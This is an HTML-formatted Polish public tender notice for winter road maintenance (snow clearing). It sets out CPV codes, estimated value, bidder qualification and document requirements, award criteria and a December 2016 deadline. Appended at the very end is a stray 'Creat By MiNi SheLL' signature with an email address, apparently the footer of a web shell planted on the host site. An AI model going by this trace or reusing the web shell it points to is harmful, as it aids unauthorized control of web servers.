POWYŻSZA LISTA MOŻE ULEC ROZSZEŻENIU O DODATKOWE DROGI tj. I,  II i III KOLEJNOŚCI ODŚNIEŻANIA (DO 10%).
Zamawiający może zlecić utrzymanie innych dróg niż w/w wymienione.
<br /><br /><b>II.5) Główny kod CPV: </b>90620000-9<br /><b> Dodatkowe kody CPV:</b>90630000-2<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              648100.00<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca musi wykazać, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje co najmniej jedną usługę polegającą na zimowym utrzymaniu dróg o wartości brutto nie mniejszej niż 300 000,00 zł  (słownie: trzysta tysięcy złotych 00/100). 

Dla wskazanych usług Wykonawca zobowiązany jest przedłożyć dowody 
(referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane lub są wykonywane) potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie.

W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców (Konsorcjum, Spółka Cywilna) o udzielenie niniejszego zamówienia wiedza i doświadczenie oceniane będą łącznie.

<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Aktualny odpis z właściwego rejestru (KRS) lub centralnej ewidencji i informacji o działalności gospodarczej (CEIDG), jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 
ust. 5 pkt 1 ustawy Prawo zamówień publicznych.

W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców (np.: Konsorcjum, Spółki Cywilnej) o udzielenie niniejszego zamówienia Zamawiający wezwie do złożenia przedmiotowego dokumentu odpowiednio przez każdego z Wykonawców.

3. Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełnienia, w zakresie w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu  zamieszcza informacje o tych podmiotach w oświadczeniach, o których mowa w pkt IV ppkt 3.1. 2) i 3), na formularzu stanowiącym Załącznik nr 1 i Załącznik nr 2 do SIWZ.

 W przypadku wspólnego ubiegania się przez wykonawców o udzielenie zamówienia 
(Konsorcjum, Spółka Cywilna) oświadczenie, o którym mowa w pkt IV ppkt 3.1. 2) i 3) składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego.
Dokumenty te potwierdzają spełnienie warunków udziału w postępowaniu oraz brak podstaw wykluczenia z postępowania w zakresie, w którym każdy z wykonawców wykazuje spełnienia warunków udziału w postępowaniu oraz braku podstaw wykluczenia z postępowania.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia dzielności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy  według formularza stanowiącego Załącznik nr 3 do SIWZ. <br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1)  Formularz OFERTA  sporządzony według formularza stanowiącego Rozdział 1 SIWZ.
2) Pełnomocnictwo (oryginał dokumentu lub kopia pełnomocnictwa poświadczona notarialnie)  jeżeli oferta, w tym wszelkie oświadczenia i dokumenty zostały podpisane przez osobę albo osoby działające na podstawie pełnomocnictwa. Jeżeli osoba/osoby podpisująca ofertę działa na podstawie pełnomocnictwa, to pełnomocnictwo to musi obejmować uprawnienie do pospisywania oferty.
 
UWAGA:
Pod pojęciem kopia pełnomocnictwa poświadczona notarialnie należy rozumieć odpis pełnomocnictwa poświadczony notarialnie (w tym kserograficzna kopia poświadczona notarialnie za zgodność z oryginałem).

</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Czas wykonaia usługi</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści ofery, na podstawie ktrej dokonano yboru wykonawcy w przypadku zmiany ustawowej stawki podatku VAT.     <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 02/12/2016, godzina: 12:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com